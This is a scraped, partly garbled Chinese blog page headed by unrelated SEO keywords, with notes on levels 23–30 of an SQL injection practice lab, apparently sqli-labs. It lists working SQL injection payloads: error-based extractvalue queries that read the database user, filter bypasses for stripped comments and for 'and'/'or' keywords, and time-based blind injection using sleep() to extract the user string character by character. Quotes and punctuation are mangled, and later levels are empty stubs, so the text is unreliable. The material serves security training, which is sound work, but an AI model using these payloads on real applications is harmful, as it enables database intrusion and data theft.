门户网站建设自查,北京建设银行支行查询官方网站,市场营销课程,网站新版level-23 #xff08;注释被过滤#xff09; 抓包#xff0c;查看正常请求和响应。 略 尝试是否存在注入 id1’,id1’#xff0c;成周期性变化 尝试 POC
POC: id1andextractValue(1,concat(0x7e,user()))-- 结果#xff1a;failed。怀疑–被过滤掉了#xff0c;尝试…level-23 注释被过滤 抓包查看正常请求和响应。 略 尝试是否存在注入 id1’,id1’成周期性变化 尝试 POC
POC: id1andextractValue(1,concat(0x7e,user()))-- 结果failed。怀疑–被过滤掉了尝试前后闭合方案
POC: id1andextractValue(1,concat(0x7e,user()))and
结果ok。
level-24(二次注入) 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-25 (and、or被过滤) 抓包查看正常请求和响应 尝试是否存在注入 存在 尝试POC
POCid-1orextractValue(1,concat(0x73,user()))--
发现and,or关键字被屏蔽了还是不区分大小写的屏蔽 使用union 结果成功注入
使用aandnd/anandd -- and
POC: id-1aandndextractValue(1,concat(0x73,user()))-- level-25a(and、or被过滤盲注) 抓包查看正常请求和响应 略 尝试是否存在注入
存在 POCid1 and if(1,sleep(3),sleep(0))-- 不休眠 POCid1 and if(1,sleep(3),sleep(0))--
休眠
POCid1 and if(1,sleep(3),sleep(0))-- 尝试POC step1: 猜字符串长度POC: id1aandndif(length(user())§1§,sleep(3),0)-- 》14
step2猜每个字符 POC: id1aandndif(substr(user(),§1§,1)§a§,sleep(3),0)-- 》rootlocalhost
level-26 (空格、注释被过滤)
抓包查看正常请求和响应 尝试是否存在注入
使用单双引号发现输出周期性变化存在注入
尝试POC
POC: unionselect1,user(),3-- 空格被过滤了 尝试
level-26a () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-27 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-27a () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-28 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-28a () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-29 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-30 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
